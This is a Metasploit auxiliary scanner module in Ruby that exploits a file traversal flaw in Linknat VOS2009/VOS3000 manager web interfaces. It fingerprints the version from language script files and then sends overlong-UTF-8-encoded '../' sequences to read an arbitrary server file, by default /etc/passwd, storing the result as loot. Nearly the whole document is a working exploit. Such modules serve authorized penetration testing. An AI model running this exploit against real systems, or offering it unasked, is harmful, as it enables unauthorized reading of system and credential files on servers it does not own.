##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linknat Vos Manager Traversal',
      'Description' => %q(
        This module attempts to test whether a file traversal vulnerability
        is present in version of linknat vos2009/vos3000
      ),
      'References' => [
        ['URL', 'http://www.linknat.com/'],
        ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']
      ],
      'Author'         => ['Nixawk'],
      'License'        => MSF_LICENSE))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])
      ], self.class)
  end

  def vos_uri(path)
    full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"
  end

  def vos_version
    case target_uri.to_s
    when /chs/i
      js_uri = vos_uri('js/lang_zh_cn.js')
    when /cht/i
      js_uri = vos_uri('js/lang_zh_tw.js')
    when /eng/i
      js_uri = vos_uri('js/lang_en_us.js')
    else
      print_warning("#{full_uri} - Please identify VOS version manually")
      return
    end

    res = send_request_cgi('uri' => js_uri)
    return unless res

    vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}")

    return unless res.code == 200
    res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil
    res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil
    "#{major} #{minor}"
  end

  def run_host(ip)
    version = vos_version
    unless version
      print_error("#{full_uri} - Failed to identify Linknat VOS")
      return
    end

    traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH']
    filename = datastore['FILEPATH']

    uri = normalize_uri(target_uri.path, '..', traversal, filename)
    res = send_request_cgi(
      'method'  => 'GET',
      'uri'     => uri
    )

    if res && res.code == 200
      path = store_loot(
        version,
        'text/plain',
        ip,
        res.body,
        filename)
      print_good("#{full_uri} - File saved in: #{path}")
    else
      print_error("#{full_uri} - Nothing was downloaded")
    end
  end
end